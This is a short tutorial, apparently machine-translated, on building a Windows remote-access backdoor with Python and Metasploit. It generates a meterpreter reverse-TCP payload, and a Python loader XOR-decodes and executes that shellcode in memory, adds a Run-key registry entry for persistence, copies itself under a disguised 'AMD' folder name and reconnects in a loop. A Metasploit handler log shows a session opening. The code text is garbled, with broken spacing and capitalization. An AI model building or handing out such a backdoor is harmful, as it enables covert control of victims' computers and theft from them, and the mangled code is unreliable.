Analysis of a remote control, thanks to the guidance of Wstone ~
Creating DLLs
./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.1.123 lport=4444 >/tmp/sc.dll
Python
main.py
Importsys, OSImportShutilImport timeImportcTYPESImportGlobImportMultiprocessingImportmultiprocessing.forking fromScImportSC fromWin32fileImportGetlongpathnameImport_winreg fromItertoolsImportizip, Cycle fromUtilsImportgetppid, kill, get_base_dirreconnect_sleep= 60Startup_sleep= 30Child_startup_sleep= 10Meter_name="Aticlex.exe"Meter_dir="AMD"User_dir= Os.path.expanduser ("~")Try: fromWin32com.shellImportshellcon, Shell Appdata_dir=Shell. SHGetFolderPath (0, Shellcon. csidl_appdata, 0, 0) Data_dir=os.path.join (appdata_dir, Meter_dir)except: Data_dir=os.path.join (user_dir, Meter_dir) meter_path=os.path.join (data_dir, Meter_name)class_popen (multiprocessing.forking.Popen):def __init__(self, *args, * *kw):ifHasattr (sys,'Frozen'): os.putenv ('_meipass2', Sys._meipass)Try: Super (_popen, self).__init__(*args, * *Kw)finally: ifHasattr (sys,'Frozen'): os.unsetenv ('_meipass2')classProcess (multiprocessing. Process): _popen=_popenclassWorker (Process):defXOR (self, data, key='\x41\x82\x99\x73\x12\xf8\x0e\x38'): return "'. Join (CHR (ord (c) ^ord (k)) forC,kinchizip (data, Cycle (key)))defrun (self): time.sleep (child_startup_sleep) code=self.xor (sc) cbuf=Ctypes.create_string_buffer (code) func=ctypes.cast (cbuf, Ctypes. Cfunctype (ctypes. HRESULT) func ()defInstall (): reg=_winreg. Connectregistry (None, _winreg. Hkey_current_user) Key= _winreg. Openkey (reg,"Software\\microsoft\\windows\\currentversion\\run", 0, _winreg. Key_all_access) _winreg. SetValueEx (key, Meter_name.split (".") [0], 0, _winreg. reg_sz, Meter_path) PATH=getlongpathname (sys.executable)ifpath! =Meter_path:if notos.path.exists (data_dir): os.makedirs (data_dir)Try: shutil.copy (path, Meter_path)exceptException as E:sys.exit (1) os.execve (meter_path, [meter_path], Os.environ)defclean ():Try: Base_dir=get_base_dir () Temp_dir=os.path.abspath (os.path.join (base_dir, os.pardir)) Mei= Base_dir.split ("\\") [-1] Pattern="%s\\_mei*"%Temp_dir forPathinchGlob.glob (pattern): Path=getlongpathname (path)ifpath! = Base_dir andMei.lower () not inchPath.lower ():Try: Shutil.rmtree (path)except: Pass except: Passdefmain (): kill (getppid ()) time.sleep (startup_sleep) install () clean () whiletrue:p=Worker () P.daemon=True p.start () p.join () time.sleep (reconnect_sleep)if __name__=="__main__": Multiprocessing.freeze_support () main ()
sc.py
sc= ' \x12\x34 ' ... # sc = Sc.dll Open with RB mode
Then Pythoninstall generates an Exe.
Listening:
MSF > Use Exploit/multi/handler MSF exploit (handler) > set payload windows/meterpreter/reverse_tcp Payload = windows/meterpreter/reverse_tcp MSF exploit (handler) > set lhost 192.168.1.123lhost = 192.168.1.123MSF exploit (handler) > Set lport 4444 lport = 4444 MSF exploit (handler) > Run [*] Star Ted Reverse handler on 192.168.1.123:4444 [*] starting the payload handler ... [*] Sending stage (770048 bytes) to 192.168.1.80 [*] Meterpreter Session 1 opened (192.168.1.123:4444-192.168.1.80:1 138) at 2014-10-22 19:03:43-0500 meterpreter >
PYTHON+MSF make Windows remote control